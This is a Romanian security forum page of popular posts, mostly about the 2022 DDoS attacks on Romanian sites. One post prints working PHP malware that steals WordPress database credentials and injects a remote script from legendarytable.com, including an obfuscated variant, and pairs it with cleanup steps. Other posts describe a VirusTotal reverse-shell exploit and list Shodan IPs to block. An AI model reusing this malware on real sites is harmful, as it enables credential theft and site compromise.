Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation since 04/18/22 in all areas

  1. After a deep security research by Cysource research team led by Shai Alfasi & Marlon Fabiano da Silva, we found a way to execute commands remotely within VirusTotal platform and gain access to its various scans capabilities. About virustotal: The virustotal.com application has more than 70 antivirus scanners that scan files and URLs sent by users. The original idea of the exploration was to use the CVE-2021-22204 so that these scanners would execute the payload as soon as the exiftool was executed. Technical part: The first step was uploading a djvu file to the page https://www.virustotal.com/gui/ with the payload: Virustotal.com analyzed my file and none of the antiviruses detected the payload added to the file's metadata. According to the documentation at the link: https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works , virustotal.com uses several scans. The application sent our file with the payload to several hosts to perform the scan. On virustotal hosts, at the time that exiftool is executed, according to CVE-2021-22204 inform, instead of exiftool detecting the metadata of the file it executes our payload. Handing us a reverse shell on our machine. After that we noticed that it’s not just a Google-controlled environment, but environments related to internal scanners and partners that assist in the virustotal project. In the tests it was possible to gain access to more than 50 internal hosts with high privileges. Hosts identified within the internal network: The interesting part is every time we uploaded a file with a new hash containing a new payload, virustotal forwarded the payload to other hosts. So, not just we had a RCE, but also it was forwarded by Google's servers to Google's internal network, it customers and partners. Various types of services were found within the networks, such as: mysql, Kubernetes, oracle database, http and https applications, metrics applications, SSH, etc. Due to this unauthorized access, it was possible to obtain sensitive and critical information such as: Kubernetes tokens and certificates, service settings info, source codes, Logs, etc. We reported all the findings to Google that fixed this issue quickly. Disclosure Process: Report received by GoogleVRP - 04.30.2021 GoogleVRP trigged the report - 05.19.2021 GoogleVRP accepted the report as a valid report - 21.05.2021 GoogleVRP closed the report - 04.06.2021 Virustotal was no longer vulnerable - 13.01.2022 GoogleVRP allowed publishing - 15.01.2022 Source: https://www.cysrc.com/blog/virus-total-blog
    8 points
  2. Adevarat, intr-o zi erau 3000+ in alta 11.000+. Cred ca RST a avut "atacuri mult mai grele" si cu iptables -j DROP s-au rezolvat instant. Sa vorbeasca cu cei care se ocupa de hosting-ul emag si alte servicii de Black Friday
    7 points
  3. Pai si bugete pentru firmele neamurilor? Ei nu cauta solutii man. Cauta sa ofere contractele si sa mulga bani
    5 points
  4. Oricum sunt inutile site-urile guvernamentale. Poti chiar spune ca sunt site-uri folosite la frauda, la cat va fura statul roman ticalos. ♥️ fratii mei rusi!
    5 points
  5. ce ne facem baieti, a picat psd.ro si inca cateva rahaturi de site-uri pe la 7 dimineata, maine poimaine o sa atace si covrigaria luca plm a sunat 1990 isi vor pachetele inapoi
    5 points
  6. Asta e curs cum sa iti ia casa foc. Nu se respecta niciun fel de normativ/standard acolo. E instalatie electrica sau lucreaza la ma-sa la grajd :)))) - Conductorii par de 1,5 mm toti - Sigurantele sunt de 16 AMPERI curba C (pentru consumatori inductivi, nu rezistivi, asa cum avem in casa la majoritatea lucrurilor). Pentru instalatiile domestice se folosesc curba A sau B. E logic, ai curba C pentru ca un consumator inductiv consuma de pana la 6 ori curentul absorbit la pornire (o sa sara siguranta aia la 60 de amperi, atunci cand toata instalatia facuta pe 1.5mm sectiune o sa arda in flacari) - Nu exista niciun fel de siguranta diferentiala - A ocupat mai mult de 70% din cutie cu ele. - Conductorii litati nu se dezizoleaza cu caterul - Este interzisa cositorirea conductorilor in instalatii electrice. Acolo se folosesc cleme speciale de tip wago (prinderea se face mecanic, altfel cositorul acela o sa curga la prima supra sarcina iar suprafata de contact este de ~0,3mm, ori de cate ori l-ar rasuci labarul) - A pus deasupra sarme intre sigurante in loc de busbar (9 sigurante de 16 amperi pe un singur conductor de 1,5mm)
    5 points
  7. E de la pluginul "Elementor" Aici este sursa ce "infesteaza" jucariile: <?php error_reporting(0); ini_set('display_errors', 0); ini_set('max_execution_time', 0); echo "ssqqss>>>"; $d = $_SERVER['DOCUMENT_ROOT'] . "/"; $files = array(); for ($i = 0;$i < 3;$i++) { try { $az = shell_exec('find ' . $d . ' -name "wp-config.php"'); $az2 = explode("\n", $az); foreach ($az2 as $file) { $fil = explode("/wp-config.php", $file); $fil = $fil[0] . "/wp-config.php"; array_push($files, $fil); } $d = $d . "../"; } catch(Exception $e) { } } $l = "/"; for ($i = 0;$i < 3;$i++) { try { $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'] . $l); $display = Array( 'php' ); $search = Array( 'wp-config.php' ); $files_ar = array(); foreach (new RecursiveIteratorIterator($it) as $file) { if (strpos($file->getFilename() , 'wp-config.php') !== false) { array_push($files, $file->getPathname()); } } $l .= "../"; } catch(Exception $e) { } } $files = array_unique($files); foreach ($files as $file) { make_index_blog($file); } die(); function get_var_reg($pat, $text) { if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) { return $matches[1][0]; } return ""; } function getijstonemoretime($path) { } function make_index_blog($path) { echo "iii->>try:" . $path . "<br />"; $az = shell_exec('cat ' . $path); if (strpos($az, "DB_PASSWORD") !== false) { } else { } if (strpos($az, "DB_PASSWORD") !== false) { sqldo($az); } } function sqldo($content) { $siteurl = "null"; if (strpos($content, "DB_NAME") !== false) { $db = get_var_reg("DB_NAME['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $host = get_var_reg("DB_HOST['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $user = get_var_reg("DB_USER['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $pass = get_var_reg("DB_PASSWORD['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $conn = new mysqli($host, $user, $pass); if ($conn->connect_error) { echo $conn->connect_error; } else { $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%options%'"; $result = $conn->query($q) or die($conn->error); while ($row = $result->fetch_assoc()) { $result5 = $conn->query("SHOW COLUMNS FROM " . $db . "." . $row["TABLE_NAME"] . " LIKE 'option_name'"); if ($result5->num_rows > 0) { $q2 = "SELECT option_value FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " where option_name='siteurl' LIMIT 1 "; $result2 = $conn->query($q2) or var_dump($conn->error); while ($row2 = $result2->fetch_assoc()) { $val = $row2['option_value']; $siteurl = $val; echo "iii->>find222:" . $siteurl . "<br />"; if (strpos($siteurl, "://") !== false) { $k = file_get_contents($siteurl); if (strpos($k, "legendarytable") !== false) { echo "iii->>contains:" . $siteurl . "<br />"; } else { $q9 = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%posts%'"; $result9 = $conn->query($q9) or die($conn->error); while ($row9 = $result9->fetch_assoc()) { $q8 = "SELECT post_content FROM " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " LIMIT 1 "; $result8 = $conn->query($q8) or var_dump($conn->error); while ($row8 = $result8->fetch_assoc()) { $val8 = $row8['post_content']; if (strpos($val8, "legendarytable") === false) { $q3 = "UPDATE " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%legendarytable%'"; $conn->query($q3); echo "iii->>" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />"; } else { echo "iii->>222ALREADY:" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />"; } } } } } } } } } $conn->close(); } return $siteurl; } function search_file_index($dir, $file_to_search) { $files = @scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { search_file_index($dir, $file_to_search); return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { search_file_index($dir, $file_to_search); return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) { make_index_upload($path); } } else if ($value != "." && $value != "..") { search_file_index($path, $file_to_search); } } } Prin fisiere, o alta versiune (cea cu cookie check) arata asa: $v=chr(112).chr(114).chr(101).chr(103).chr(95).chr(109).chr(97).chr(116).chr(99).chr(104); if(!$v(chr(35).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr(97).chr(100).chr(109).chr(105).chr(110).chr(124).chr(119).chr(112).chr (45).chr(115).chr(101).chr(116).chr(116).chr(105).chr(110).chr(103).chr(115).chr(124).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr (108).chr(111).chr(103).chr(103).chr(101).chr(100).chr(35).chr(105),implode(" ",array_keys($_COOKIE)))){echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32). chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(116).chr(114).chr(105).chr(99).chr(107).chr(46).chr(108).chr(10 1).chr(103).chr(101).chr(110).chr(100).chr(97).chr(114).chr(121).chr(116).chr(97).chr(98).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(101).chr(119).c hr(115).chr(46).chr(106).chr(115).chr(63).chr(118).chr(61).chr(54).chr(46).chr(51).chr(46).chr(50).chr(39).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).ch r(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114). chr(105).chr(112).chr(116).chr(62);} Pentru a verifica checksum la fisierele din core, va recomand wp-cli Exemplu: ./wp --allow-root core verify-checksums Warning: File doesn't verify against checksum: wp-login.php Warning: File doesn't verify against checksum: wp-admin/index.php Warning: File doesn't verify against checksum: wp-admin/admin.php Warning: File doesn't verify against checksum: wp-admin/admin-ajax.php Warning: File should not exist: wp-admin/try.php Error: WordPress installation doesn't verify against checksums. Ar trebui sa dea cam asa: ./wp --allow-root core verify-checksums Success: WordPress installation verifies against checksums. Este necesara si eliminarea scripturilor din posts (wp_posts). Se poate identifica foarte usor printr-un query mysql: select * from wp_posts where post_content like '%news.js%'; De asemenea, se poate elimina din wp_posts utilizand replace. Aici vedeti ca pot fi mai multe versiuni. Puteti extinde cautarea dupa %script% sau/si legendarytable si apoi faceti replace la ce e necesar update wp_posts set post_content = replace(post_content, "<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>", ""); Mai este inca o versiune ce isi instaleaza 2 plugine (inactive) prin care isi pot rula diverse. O alta versiune isi face check la cookies. Acolo unde exista cookies, nu face redirect catre alte site. Vizeaza doar vizitatori noi pe care-i redirecteaza Sfat: 1. Nu mai instalati toate låbile de plugine 2. Folositi in plm Content-Security-Policy! :)))
    4 points
  8. " PERCHEZIȚIE LA O PERSOANĂ BĂNUITĂ DE IMPLICARE ÎN ATACURILE INFORMATICE RECENTE Începând cu data de 29 aprilie a.c., o serie de atacuri informatice de tip DDoS - Distributed Denial of Service a afectat multiple site-uri web care aparțin unor instituții publice și organizații private din România. Atacurile ar fi fost revendicate de o grupare intitulată ‘KillNet’, de origine rusă, iar activitatea acestora ar fi promovată pe diferite canale de comunicare, fiind motivate de contextul conflictului militar Rusia - Ucraina. Imediat după aceste atacuri, specialiști ai Ministerului Afacerilor Interne, Direcției Generale de Protecție Internă, Inspectoratului General al Poliției Române, precum și din cadrul celorlalte structuri și instituții din sistemul de apărare, ordine publică și siguranță națională, au desfășurat activități specifice din competență, pentru contracararea atacurilor, protecția site-urilor vizate și identificarea persoanelor responsabile, în vederea asigurării rezilienței infrastructurilor IT. În urma activităților comune desfășurate, a fost identificată o persoană bănuită, cetățean român, rezident în Marea Britanie, care ar fi susținut activitatea grupării infracționale, prin oferirea de sprijin pentru traducerea din limba rusă în limba română a materialelor promovate de gruparea infracțională și prin indicarea unor site-uri web din Romania care ar fi putut fi atacate prin același mod de operare. La data de 2 mai 2022, în urma cooperării polițienești internaționale, autoritățile de aplicare a legii din Marea Britanie, prin National Crime Agency, au efectuat o percheziție domiciliară, în Marea Britanie, la adresa de reședință cetățeanului român, bănuit că ar fi fost implicat în desfășurarea atacurilor informatice, din ultimele zile, asupra infrastructurii IT din România. De asemenea, ofițeri specializați din cadrul IGPR- Direcția de Combatere a Criminalității Organizate - Serviciul de Combatere a Criminalității Informatice s-au deplasat în Marea Britanie, pentru acordarea de sprijin în ancheta desfășurată de National Crime Agency." Sursa: Politia Romana Personal cred ca isi pierd timpul dand jos site-urile partidelor....exact ce a spus si tex, cui ii pasa de site-urile astea?
    4 points
  9. Despite the old saying, not everything lives forever on the internet — including stolen crypto. This week, crypto security firm BlockSec announced that a hacker figured out how to exploit lending agreements and triple their crypto reward on the ZEED DeFi protocol, which runs on the Binance Smart Chain and trades with a currency called YEED. “Our system detected an attack transaction that exploited the reward distribution vulnerability in ZEED,” BlockSec said on Twitter this week. The end of the thread threw readers for a loop, though, because BlockSec also said the stolen currency had been permanently lost because of a self-destruct feature the hacker used. “Interestingly, the attacker does not transfer the obtained tokens out before self-destructing the attack contract. Probably, he/she was too excited,” BlockSec said in a following tweet. Possible Vigilante The sheer thought of losing a million dollars is enough to make anybody sweat bullets, but it’s possible the hacker did this on purpose. BlockSec isn’t sure what the motive was, and suggests it could’ve been an accident. A report by VICE published this week says the hacker could’ve been a vigilante with a message or something to prove. Because the self-destruct feature “burned” the tokens, they’re essentially gone forever. VICE suggests the hacker could’ve wanted to watch the crypto world burn — and the mysterious attacker certainly did cause a lot of chaos. After selling the hacked tokens, YEED’s value crashed to near zero. Sales won’t resume until ZEED takes steps to secure, repair and test its systems. Maybe the hacker messed up, or maybe we just witnessed a modern day Robin Hood attack. It’s possible we’ll never know who pulled off the hack, or why. Source: https://futurism.com/the-byte/hacker-steals-destroys Dorele, ce făcuși..... 😂
    4 points
  10. Salut, si eu as recomanda SaaS pentru magazine mici, cel putin la inceput de drum pana cand se stabilizeaza treaba. Cunosc pe cineva care a luat decizia de trece de la Magento la Shopify si a fost una din cele mai bune decizii. Costurile de hosting, mentenanta si update-uri permanente (au fost si probleme de securitate, a trebuit investigat, refacut, backup-uri, etc.) au fost principalul motiv pentru migrare. Acum totul e mai simplu, fara batai de cap. Plati cu cardul, administrare usoara, API-ul de la Shopify are tot ce trebuie, griji in minus. Overall, costurile sunt mai mici pe termen lung. Sigur, pentru magazine mari, cu departamente IT, situatia se schimba. Personal, atunci m-as gandi sa fac mutarea de la SaaS, sunt suficiente servicii/tooluri de migrare ulterioara de pe Shopify pe Magento si restul.
    4 points
  11. Era tare sa poti da tag la politia de pe forum. Si la aia de la SRI intrati aici precum gandacii pe langa conductele de termoficare :))))))
    3 points
  12. Intre timp, romania educata https://www.romaniatv.net/primarie-din-valcea-datoare-la-trupa-de-lautari-se-vand-microbuzele-scolare-pentru-plata-sumei-uriase-altfel-nu-putem_6455043.html
    3 points
  13. Ultima data era cineva de la Mediafax care manage-uia feed-ul. Tot Yahoo-ul Romania e facut pe pile, nu are treaba support-ul.
    3 points
  14. Pe aceasi logica in care iti pierzi varsta daca pierzi buletinul.
    3 points
  15. S-a activat scriptu Blowjob :)))) Ce terminati frate
    2 points
  16. Bulangiilor ce sunteti, d-aia am luat eu amenda ca am parcat masina gresit, n-ati avut ce sa-mi faceti pe forum si m-ati ars la parcare.
    2 points
  17. Buna ideea. Cu GeoIP mod pt. apache GeoIPEnable On # doamne futa-va pe toti si scapam de greutati :)) SetEnvIf GEOIP_COUNTRY_CODE CN BlockCountry SetEnvIf GEOIP_COUNTRY_CODE RU BlockCountry SetEnvIf GEOIP_COUNTRY_CODE UA BlockCountry SetEnvIf GEOIP_COUNTRY_CODE IN BlockCountry <RequireAll> Require all granted Require not env BlockCountry </RequireAll>
    2 points
  18. Poti sa ii faci un fingerprint la browser si sa il blochezi specific pe el. Exista https://fingerprintjs.com/, pentru free plan ai 20k IDs pe luna, mai mult decat suficient. Sunt si alte alternative precum https://github.com/mattbrailsford/imprintjs. Sa implementezi tu ceva similar nu merita efortul.
    2 points
  19. Sunt curios, este cineva pe aici care s-a uitat putin la "firehose-urile patched" de pe net pentru telefoanele Xiaomi? Firehose-ul e o parte a firmware-ului ce te previne sa ii dai flash in EDL daca nu ai autorizatie de la Xiaomi (Emergency Download Mode) - cel putin din ce inteleg eu despre domeniu, corectati-ma daca gresesc. In fine, ideea e ca au aparut pe internet multe firehose-uri "patched" pentru anumite telefoane Xiaomi. Daca inlocuiesti firehose-ul original al firmware-ului cu cel patch-uit pe care ti-l da indianu' de pe YouTube, atunci o sa poti da flash in EDL fara a avea un cont autorizat Xiaomi. Din pacate, doar telefoanele mai vechi sau mai ieftine au firehose-uri patched. Dintr-un motiv sau altul, cele recente (cum e Mi 11-le) nu au. Masura asta mi se pare o nesimtire din partea celor de la Xiaomi, luand in calcul ca mi-am brickuit Mi 11-le de la update-ul lor *oficial* (nu glumesc). Dupa aia l-am mai brick-uit de inca vreo 2 ori dar aia a fost vina mea. Ca sa debrick-uiesc a trebuit sa-i dau unui indian cu acces la un cont autorizat (probabil lucra la Xiaomi) 25 de euro ca sa-mi resuscitez telefonul, ca altfel era o caramida (literalmente). A mai avut cineva pe aici "aventuri" similare cu telefoane Xiaomi? Daca da, ati gasit vreo metoda sa o scoateti la capat fara sa platiti pe cineva cu autorizatie? Si care mai exact e faza cu firehose-urile astea patched in primul rand? A, si sper ca a 3-a sa fie ultima oara cand mai brickuiesc Mi 11-le. Am dat 3000 de lei pe un telefon care isi da brick singur... clar nu mai cumpar Xiaomi.
    2 points
  20. Lăsând gluma la o parte, este banal ce se întâmplă. Cum sa nu poți proteja niște site-uri la un atac DDoS banal de 3000-5000 de boți? Era un articol cum ca s-au investit nu știu cate milioane de euro pentru dezvoltarea "Capitalei cibernetice a Europei" a.k.a România. S-a mediatizat mult știrea asta si oamenii care nu au cunoștințele necesare rămân uimiți. Ne cam scade din reputație... daca s-ar fi chinuit puțin cei care se ocupa de site-urile respective ar fi găsit soluții de protecție open-source pe GitHub, dar incompetenta e la ea acasă... si cine plm ar face asta pentru 1500 lei? Daca aveți prieteni/cunoștințe care au poziții înalte pe acolo, ar fii o idee sa le oferim un topic/secțiune aici, si sa-i ajutam cu cate o idee...
    2 points
  21. Si sms-urile alea de spam care e treaba cu ele de unde au numerele "sensibile" oare ? :)))))))))
    2 points
  22. In rem, demareaza ancheta asupra faptei, nu a faptasilor. https://legeaz.net/dictionar-juridic/in-rem
    2 points
  23. "Atac dede o se, asa cum este el denumit de specialisti" i-auzi ma, plm, care pronunti asa? =)))) au dat jos site-ul psd-ului lol DIICOT a anunțat că a demarat o anchetă penală. Hmmm... si cum ii vor ancheta pe rusi?
    2 points
  24. Shodan.io is a search engine with the job of crawing the internet for publically acessible servers, software, and equipment. Intended as a site for cyber security experts and researchers, Shodan is a popular destination for those with other intentions as well. While not an inherently bad site, a hacker might want to cause some trouble by remotely accessing a web server with default credentials found on Shodan. News stories over the last few years talk about how Shodan has been used to log into traffic light controls, web cameras, and find databases to exploit. How do you prevent your network from being scanned and added to Shodan? First you’ll need a router or firewall with more than basic functions. Your device should accept custom firewall rules where you can block by remote IP address. Second you’ll need a list of the servers that Shodan uses to crawl the internet. Below is a list of known Shodan IP addresses and host names. A firewall rule should be created to block each entry. 93.120.27.62 - m247.ro.shodan.io 85.25.43.94 - rim.census.shodan.io 85.25.103.50 - pacific.census.shodan.io 82.221.105.7 - census11.shodan.io 82.221.105.6 - census10.shodan.io 71.6.167.142 - census9.shodan.io 71.6.165.200 - census12.shodan.io 71.6.135.131 - census7.shodan.io 66.240.236.119 - census6.shodan.io 66.240.192.138 - census8.shodan.io 198.20.99.130 - census4.shodan.io 198.20.70.114 - census3.shodan.io 198.20.69.98 - census2.shodan.io 198.20.69.74 - census1.shodan.io 188.138.9.50 - atlantic.census.shodan.io If you have a router capable of displaying active sessions or reporting blocked firewall events, you’ll see something like this. There are of course a number of things you can do to protect yourself from uninvited internet guests. First and foremost, don’t use default credentials for your router, server, database, IP camera, etc. These devices are incredibly easy to find through Shodan and there is never an excuse for defaults! You can also set your router to only allow inbound traffic from known IP addresses. Disabling WAN pings is another way you can try and prevent inbound traffic to your network. The easiest test is to run a Shodan search against yourself. If you know your external IP address, plug it into Shodan and look at the results. Do you see open ports? Do you have devices that are unsecured or running default credentials? The best solution is not to have public facing devices at all and instead to use a VPN to remotely access equipment, but in some situations that just isn't an option and the firewall rules are a fix. There are a number of routers that can provide the necessary firewall capabilities to block sites like Shodan from scanning your network. (Blocking a Shodan IP on a Peplink) The Pepwave Surf SOHO or Cradlepoint MBR1200B will provide adequate blocking for most homeowners or small businesses. Medium to enterprise size companies will want to look at more capable options like the Peplink Balance 380 or the AER3100. SOURCE
    2 points
  25. https://www.insanelyusefulwebsites.com Autor: jayra
    2 points
  26. Salutari, Are cineva un contact pe unde e nevoie pentru introducerea feed-urilor de la site-urile de stiri in ro.yahoo.com? Ofer 1000 euro, banul jos daca se incheie deal-ul (cu finalizare, ca la curve)
    2 points
  27. First, it's illegal if you don't have any legit authorization to do that. To do that, you must have a knowledge base that is missing from you. If a server (IP) has multiple ports open, it doesn't mean that you can obtain access to the server. To make an idea about the penetration testing process ("infiltrate"), I recommend having a look at Hackthebox and trying to learn how to do reconnaissance, information gathering, exploit, lateral movement, privilege escalation, etc. YouTube may also help.
    2 points
  28. :)))))))))))) Ba nene, nu mai fumati nasoale inainte de a intreba ceva. Cum adica sa pierzi vechimea? E rubrica acolo cu data obtinerii categoriei, da-o in pastele ma-sii S-a desfacut in doua si ai pierdut doar mecla sau cum parastas s-a pierdut mecla dar ai verso Sa-l reînmuiești poate
    2 points
  29. 2 points
  30. Buna seara, Urmeaza sa deschid, impreuna cu niste asociati, o companie care importa si vinde niste echipamente electrice. Caut persoana care sa creeze si sa administreze magazinul online. Preferam sa lucram cu wordpress/joomla/platforme prebuilded de ecommerce, iar persoana interesata sa aibe experienta vasta in acest domeniu (un portofoliu este bine-venit). Reprezinta un plus experienta in SEO si google/fb ads. Suntem interesati atat de o colaborare scurta (configurarea initiala), cat si de ceva de durata. Cei interesati sa imi trimita PM.
    2 points
  31. Ministerul Cercetării, Inovării şi Digitalizării recrutează experţi în domeniul IT&C pentru implementarea reformelor şi investiţiilor asumate de România în acest domeniu prin Planul Naţional de Redresare şi Rezilienţă (PNRR). Salariile sunt de până la 4.000 de euro net, iar specialiştii vor fi angajaţi până în anul 2026. „Ministerul Cercetării, Inovării şi Digitalizării (MCID) anunţă stabilirea grilei de salarizare pentru personalul angajat în afara organigramei, ca parte a „Grupului de Operativ pentru Implementarea şi Monitorizarea Reformelor şi Investiţiilor privind Transformarea Digitală” (Task Force), din Planul Naţional de Redresare şi Rezilienţă (PNRR). Grila de salarizare a acestei unităţi cu un rol major în reuşita implementării transformărilor digitale asumate de România este una competitivă, de până la 4.000 euro net lunar, care permite recrutarea celor mai buni specialişti care vor fi angajaţi până în anul 2026”, transmite ministerul, într-un comunicat. Candidaţii pentru funcţia contractuală de conducere şi pentru cele 16 funcţii de execuţie pot depune dosarul pentru procesul de selecţie până pe 26 aprilie, interviurile având loc în perioada 3 – 5 mai. Sunt scoase la concurs o funcţie contractuală de conducere – un post de manager, studii superioare, program de lucru 8 h/zi, la Task Force/MCID şi 16 funcţii de execuţie, respectiv: manager executiv – 1 post expert implementare – 2 posturi arhitect de sistem în domeniul TIC – 2 posturi specialist în domeniul calităţii – 1 post expert în securitate cibernetică – 1 post administrator baze de date – 2 posturi inginer de sistem în informatică – 3 posturi manager analiză de business în domeniul TIC – 3 posturi inginer de dezvoltare a produselor sofware (UI/UX) – 1 post Mai multe detalii despre posturile scoase la concurs – condiții, tematică și bibliografie – pot fi consultate AICI.
    2 points
  32. Sa inteleg ca erau multi romani pe acolo? sau care-i treaba cu RO police? 🚨 more info Raid Forums Is Down
    2 points
  33. Tu cred ca nu ai idee care e diferenta dintre mono si stereo. Stereo nu inseamna doua boxe si atat. Rezumat la tiganul de pe youtube:
    2 points
  34. https://www.omgubuntu.co.uk/2022/05/nvidia-unexpectedly-announces-open-source-gpu-kernel-modules
    1 point
  35. Wed, May 25, 2022, 3:00 PM - 6:00 PM (your local time) To our dearest community: We are very happy to announce that we are restarting our meetup series. As you know, our team cares deeply about sharing information, tooling and knowledge as openly as possible. Therefore, we are proud to be able to have these specialists in cybersecurity share what they have learned on the frontlines: 18:00 - 18:45 Tiberiu Boros, Andrei Cotaie - Living off the land In security, "Living off the Land" (LotL or LOTL)-type attacks are not new. Bad actors have been using legitimate software and functions to target systems and carry out malicious attacks for many years. And although it's not novel, LotL is still one of the preferred approaches even for highly skilled attackers. Why? Because hackers tend not to reinvent the wheel and prefer to keep a low profile, i.e., leave no "footprints," such as random binaries or scripts on the system. Interestingly, these stealthy moves are exactly why it's often very difficult to determine which of these actions are a valid system administrator and which are an attacker. It's also why static rules can trigger so many false positives and why compromises can go undetected. Most antivirus vendors do not treat executed commands (from a syntax and vocabulary perspective) as an attack vector, and most of the log-based alerts are static, limited in scope, and hard to update. Furthermore, classic LotL detection mechanisms are noisy and somewhat unreliable, generating a high number of false positives, and because typical rules grow organically, it becomes easier to retire and rewrite the rules rather than maintain and update them. The Threat Hunting team at Adobe set out to help fix this problem. Using open source and other representative incident data, we developed a dynamic and high-confidence program, called LotL Classifier, and we have recently open sourced it to the broader security community. In this webcast you will learn about the LotL Classifier, intended usage and best practices, and how you can obtain and contribute to the project. 18:50 - 19:35 Ciprian Bejean - Lessons learned when playing with file infectors Linkedin: https://www.linkedin.com/events/bsidesbucharestonlinemeetup6927924413371678720/ Zoom: https://us05web.zoom.us/j/83643751520?pwd=UDU0RVE0UmZjWHN2UnJPR095SUxpQT09
    1 point
  36. For those of you familiar with boolean operators and advanced search modifers in the likes of Google and Bing (I include Yahoo, Altavista, MSN and Live Search in this as they all run off Bing’s search engine as of last year); you will know that the extremely useful field command “inurl:” does not work in Microsoft’s Bing search engine. Microsoft temporarily suspended support of this field command back in 2007 due to “what appears to be mass automated usage for data mining”. They never brought it back. The inurl: field command is used by recruiters and sourcers alike to find public profiles in LinkedIn, search for CVs on the web and generally exploit patterns in web addresses that can lead to candidate information. Google have a virtual monopoly on this as they are the last major search engine left that still allow you to search within the url of a web address. Well, not any more. It turns out that Bing does allow you to search within the url of a web page, in fact they have a documented search command that allows you to search within the url, title, meta tags and much more with just one command. This nifty little command is called “instreamset” and allows you to specify key words that you wish to search for within either the url, title, body or anchors of a webpage. In fact it goes one step further and allows you to combine any of these meta tags in your search. Here’s an example: if you run the following search in Bing it will look for the letters “recruitment” in either the Title or Url of a web-page: instreamset:(url title):recruitment If you change this to just instreamset:url:recruitment then Bing will just search the url for these letters. I say letters as, unlike Google, Bing appears to search for the letters rather than treating our search paramater as a whole word. If you run a search for inurl:recruitment in Google, you tend only to see “recruitment” as a whole word in the url, preceded and followed by a special character such as / – . etc. This can be a pain when looking for CVs, for example, as they often appear in urls such as wwww.mycv.com which Google might not prioritise as it sees the whole word “mycv” rather than seeing “cv” as part of that term. Thankfully you can also filter words from the url by inserting the negative sign or hyphen in front of instreamset as follows: site:linkedin.com -instreamset:url:dir -instreamset:url:groups “java developer” In this example Bing filters out directory and group listings from our search for the public profiles of Java Developers. When searching for CVs you could run a search for the following when looking for Software Developers in Dublin: instreamset:(title url):cv “software developer” dublin -advice -jobs -sample -apply -description -submit This works very similarly to a Google search for (inurl:~cv | intitle:~cv) with Bing also searching for synonyms of CV such as resumé and “curriculum vitae”. Fundamentally Bing remains weak when it comes to indexing public LinkedIn profiles so it still doesn’t work as well as Google for LinkedIn searches but it does provide a great, comprehensive alternative to Google for finding CVs and other profile searches that would otherwise require a url search. Which search engine do you prefer to use and why? Source
    1 point
  37. if you have the authorization from the client to do this . then you can see what type of services are running on the open ports and start from there.
    1 point
  38. 2008 e data obtinerii categoriei, 2014 data la care a fost schimbat ultima oara. Teoretic ar trebui sa fie valabil pana in 2024. Cred ca trebuie doar sa soliciti un duplicat. https://www.drpciv.ro/document-details/permise/5ab13584fa4e9422012c2bab EDIT: Din ce scrie pe acolo, noul document va fi eliberat cu valabilitate celui pierdut/deteriorat. Dat fiind ca mai sunt doar 2 ani de valabilitate eu unul as face si o fisa medicala. Asa ai 10 ani de valabilitate. Scapi de o grija si de plata altor 90-100 de lei peste 2 ani.
    1 point
×
×
  • Create New...